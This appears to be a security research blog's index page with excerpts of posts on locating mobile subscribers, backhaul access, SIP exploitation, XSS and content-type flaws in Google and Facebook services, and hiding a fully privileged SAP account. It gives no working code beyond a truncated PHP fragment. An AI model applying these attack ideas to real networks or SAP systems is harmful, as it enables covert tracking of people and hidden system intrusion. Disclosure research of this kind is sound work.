Thursday, April 3, 2014

Search and Neutralize. How to Determine Subscriber’s Location

Mobile networks can be attacked though multiple vectors. In this article, we will consider an attack that allows detecting a cell where a subscriber is located. You see, I do not use more common measure units because the size of a cell is not permanent. In cities, a cell site may have a range of hundred meters, and in rural areas, the range is about several kilometers.

Friday, February 28, 2014

Unusual 3G/4G Security: Access to a Backhaul Network

A backhaul network is used to connect base stations (known as NodeB in 3G terminology) to a radio network controller (RNC).

Connection costs for base stations comprise a significant part of provider's total expenses, so it is reasonable to reduce costs related to building and running of such networks, in particular by implementing new technologies.

Monday, February 24, 2014

A Sketch of SIP Security

The Internet is a great tool for communication. You can contact other people using e-mail, online chats, voice and video messengers. With the arrival of new cable systems and Balloon-Powered Internet, soon even the penguins of Antarctica will have access to the Internet!

But what about voice? Since there's such wide Internet coverage, why do we need telephone lines?  We could send voice over Internet channels and SIP (Session Initiation Protocol) addresses this need. SIP has a very interesting story but first we want to highlight certain aspects of the protocol.
SIP is the most commonly used protocol for Voice over Internet Protocol (VoIP) services. SIP is a protocol for initiating a session for further data transfer. It transfers information such as login, domain and password in clear text (in open or hash form). Sometimes the authentication process is not supported (connection is established as a combination IP:port).

Next we will examine several threats that can occur while using SIP and methods to exploit them.

Friday, January 31, 2014

True Tales About Vulnerabilities in Google Services

Story 1. The Little Content Type that Could

The vulnerability was found in Feedburner. First, I created a feed and tried to inject malicious data. No success there. Injected data just wouldn’t show up, only harmless links were presented. I took a few more attempts and then I found lots of messages from PodMedic. PodMedic examines links in every feed. If it finds troubles in creating a feed, it reports the cause of such troubles. The messages read that links are incorrect because the content type returned was a text type.

Hmm. Ok. I bet the content type on this page isn't filtered. A simple script for my server:

; charset=UTF-8'); ?>

And here it is:

Monday, October 21, 2013

A Story about XSS on Facebook

One day, browsing Facebook I discovered an interesting tool – Graph API Explorer. It's a tool designed to work with Facebook Graph API. It allows reading or posting data on Facebook, testing permissions, etc. So what can it actually do?

Monday, September 30, 2013

Inside Mobile Internet Security

The mobile Internet has truly gone global. An estimated 6.8 billion mobile subscriptions were reported globally at the end of 2012 [1]. That’s the equivalent of 96 percent of the world’s population being connected via a mobile device. And it represents a huge increase on the 6.0 billion subscribers reported just 12 months prior [2].

As cellular networks grow, so do the number and frequency of mobile internet connections; posing a new set of challenges for the IT Security community. While many of us are familiar with the architecture of the regular Internet – twisted pairs, Ethernet, TCP/IP – the architecture behind the mobile Internet is less widely understood, leaving users vulnerable to the actions of hackers with only a slightly better level of knowledge.

In this post, Positive Research, the research division of Positive Technologies, will demystify the mobile internet by explaining its general principles, take a deeper look at the General Packet Radio Service (GPRS) Tunneling Protocol, discuss the GPRS Roaming Exchange (GRX) Network and demonstrate some practical issues that arise when attempting to secure a mobile network.

Thursday, August 8, 2013

SAP's Backdoor

SAP security research is one of my basic duties in Positive Technologies. Moreover, I had to think of what I would speak about to the participants of our PHDays III forum. Thus, I came to the following subject of research: how to hide a user with the SAP_ALL profile (i.e. all possible authorizations) in the system. If a malicious user manages to log in to the system and get the authorization to create users and assign privileges to them, then his next most probable step is to create a new account for himself, of course with all authorizations in the system. However, this user is listed in the results of internal checks and external audits, and there is zero chance that a user with SAP_ALL authorizations will not arouse any interest.